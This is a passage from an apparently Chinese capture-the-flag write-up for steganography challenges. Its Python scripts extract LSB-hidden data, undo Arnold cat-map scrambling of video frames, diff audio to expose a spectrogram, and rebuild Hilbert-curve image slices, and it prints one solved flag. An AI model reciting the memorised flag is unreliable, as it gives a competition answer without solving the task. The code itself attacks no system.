                img.putpixel((i,j),255)
    img.save("./3/{}.png".format(n))

StegLab1-pointAttack

  • 随机噪声攻击
from PIL import Image


class Solution1:
    def Encrypt(self, img, key):
        img = Image.open(img)
        img_width, img_height = img.size

        key_binary = ''.join(format(ord(char), '08b') for char in key)
        print(key_binary)
        key_index = 0

        for y in range(0, img_height, 2):
            for x in range(0, img_width, 2):
                if key_index < len(key_binary):
                    pixel = list(img.getpixel((x, y)))
                    pixel[0] = (pixel[0] & 0xFE) | int(key_binary[key_index])
                    img.putpixel((x, y), tuple(pixel))
                    key_index += 1

        return img


class Solution:
    def Decrypt(self,img) -> str:
        img = Image.open(img)
        img_width, img_height = img.size
        extracted_key_binary = ""

        for y in range(0, img_height, 2):
            for x in range(0, img_width, 2):
                pixel = img.getpixel((x, y))
                extracted_key_binary += str(pixel[0] & 0x01)
        # print(extracted_key_binary)
                if len(extracted_key_binary) >= 8 and extracted_key_binary[-8:] == "11111111":
                    break
            if len(extracted_key_binary) >= 8 and extracted_key_binary[-8:] == "11111111":
                break

        extracted_key_binary = extracted_key_binary[:-8]  # 去除冗余数据
        key = ""
        for i in range(0, len(extracted_key_binary), 8):
            byte = extracted_key_binary[i:i + 8]
            key += chr(int(byte, 2))

        return key

Monday left me broken

  • 猫脸变换(媒体内容存在非常明显的位移现象),抽取一帧爆破参数
import numpy as np
from PIL import Image
import cv2


im = Image.open('test.png')
im = np.array(im)


def dearnold(img):
    r, c, t = img.shape
    p = np.zeros((r, c, t), dtype=np.uint8)

    for a in range(1, 11):
        for b in range(1, 11):
            for i in range(r):
                for j in range(c):
                    for k in range(t):
                        x = ((a * b + 1) * i - b * j) % r
                        y = (-a * i + j) % r
                        p[x, y, k] = img[i, j, k]
            filename = f'new/dearnold{a}_{b}.jpg'
            cv2.imwrite(filename, p)
            print('dearnold{}_{}'.format(a, b))
    return p

dearnold(im)
  • a = 5 b = 5,恢复整个视频
import numpy as np
import tqdm
import cv2


def dearnold(img):
    r, c, t = img.shape
    p = np.zeros((r, c, t), dtype=np.uint8)
    a = 5
    b = 5
    for i in range(r):
        for j in range(c):
            for k in range(t):
                x = ((a * b + 1) * i - b * j) % r
                y = (-a * i + j) % r
                p[x, y, k] = img[i, j, k]
    return p


video = "final.mkv"
cap = cv2.VideoCapture(video)
fps = cap.get(cv2.CAP_PROP_FPS)
size = (int(cap.get(cv2.CAP_PROP_FRAME_WIDTH)),
        int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))
fourcc = cv2.VideoWriter_fourcc(*'mp4v')
out = cv2.VideoWriter('return.mp4', fourcc, fps, size)
pbar = tqdm.tqdm(total=int(cap.get(cv2.CAP_PROP_FRAME_COUNT)))


ret, frame = cap.read()
while ret:
    ret, frame = cap.read()
    if ret:
        frame = dearnold(frame)
        out.write(frame)  # 将处理后的帧写入新的视频文件
        pbar.update(1)
    else:
        break

cap.release()
out.release()
  • 某一时刻发现信息
截取自官方wp,这玩意儿也太糊了
  • 已知dct分块隐写,下载源音频(转wav格式)
from scipy.io import wavfile
import matplotlib.pyplot as plt
from numpy import array
from matplotlib.mlab import window_none

# 读取的数据可能需要调整,看情况
rate, data = wavfile.read('old_.wav')
data = array([i[0] for i in data])
rate2, data2 = wavfile.read('output_.wav')

data3 = data2 - data

n_samples = data3.shape[0]
fft_size = 4096
plt.specgram(data3, fft_size, rate, window=window_none, noverlap=10, scale='dB')

plt.show()
  • 扫描得剩下部分flag
WMCTF{Video_Audio_I_CAN_GOT_both}

perfect two way foil

  • 可恶,脚本不会写
  • 二位希尔伯特曲线转三位希尔伯特曲线,按照Z轴分离出来
import numpy as np
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from PIL import Image

def _hilbert_3d(order):
    def gen_3d(order, x, y, z, xi, xj, xk, yi, yj, yk, zi, zj, zk, array):
        if order == 0:
            xx = x + (xi + yi + zi)/3
            yy = y + (xj + yj + zj)/3
            zz = z + (xk + yk + zk)/3
            array.append((xx, yy, zz))
        else:
            gen_3d(order-1, x, y, z, yi/2, yj/2, yk/2, zi/2, zj/2, zk/2, xi/2, xj/2, xk/2, array)
            gen_3d(order-1, x + xi/2, y + xj/2, z + xk/2, zi/2, zj/2, zk/2, xi/2, xj/2, xk/2, yi/2, yj/2, yk/2, array)
            gen_3d(order-1, x + xi/2 + yi/2, y + xj/2 + yj/2, z + xk/2 + yk/2, zi/2, zj/2, zk/2, xi/2, xj/2, xk/2, yi/2, yj/2, yk/2, array)
            gen_3d(order-1, x + xi/2 + yi, y + xj/2 + yj, z + xk/2 + yk, -xi/2, -xj/2, -xk/2, -yi/2, -yj/2, -yk/2, zi/2, zj/2, zk/2, array)
            gen_3d(order-1, x + xi/2 + yi + zi/2, y + xj/2 + yj + zj/2, z + xk/2 + yk + zk/2, -xi/2, -xj/2, -xk/2, -yi/2, -yj/2, -yk/2, zi/2, zj/2, zk/2, array)
            gen_3d(order-1, x + xi/2 + yi + zi, y + xj/2 + yj + zj, z + xk/2 + yk + zk, -zi/2, -zj/2, -zk/2, xi/2, xj/2, xk/2, -yi/2, -yj/2, -yk/2, array)
            gen_3d(order-1, x + xi/2 + yi/2 + zi, y + xj/2 + yj/2 + zj , z + xk/2 + yk/2 + zk, -zi/2, -zj/2, -zk/2, xi/2, xj/2, xk/2, -yi/2, -yj/2, -yk/2, array)
            gen_3d(order-1, x + xi/2 + zi, y + xj/2 + zj, z + xk/2 + zk, yi/2, yj/2, yk/2, -zi/2, -zj/2, -zk/2, -xi/2, -xj/2, -xk/2, array)

    n = pow(2, order)
    hilbert_curve = []
    gen_3d(order, 0, 0, 0, n, 0, 0, 0, n, 0, 0, 0, n, hilbert_curve)

    return np.array(hilbert_curve).astype('int')

def _hilbert_2d(order):
    def gen_2d(order, x, y, xi, xj, yi, yj, array):
        if order == 0:
            xx = x + (xi + yi)/2
            yy = y + (xj + yj)/2
            array.append((xx, yy))
        else:
            gen_2d(order-1, x, y, yi/2, yj/2, xi/2, xj/2, array)
            gen_2d(order-1, x + xi/2, y + xj/2, xi/2, xj/2, yi/2, yj/2, array)
            gen_2d(order-1, x + xi/2 + yi/2, y + xj/2 + yj/2, xi/2, xj/2, yi/2, yj/2, array)
            gen_2d(order-1, x + xi/2 + yi, y + xj/2 + yj, -yi/2, -yj/2, -xi/2, -xj/2, array)

    n = pow(2, order)
    hilbert_curve = []
    gen_2d(order, 0, 0, n, 0, 0, n, hilbert_curve)

    return np.array(hilbert_curve).astype('int')
# Generate 3D Hilbert curve for order 3
curve = _hilbert_3d(6)
curve_2 = _hilbert_2d(9)

p = np.array(Image.open('out_flag.png').convert('RGBA'))
line = []
for i in curve_2:
    line.append(p[i[0], i[1]])
line = np.array(line)
remake_3d = np.zeros((64,64,64,4), dtype=np.uint8)
for i in range(len(curve)):
    remake_3d[curve[i][0], curve[i][1], curve[i][2], :] = line[i]

for i in range(64):
    pic = Image.fromarray(remake_3d[:,:,i,:])
    pic.save('res/' + str(i) + '.png')
  • LSB 提取
暂无评论

发送评论 编辑评论


				
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
颜文字
Emoji
小恐龙
花!
上一篇
下一篇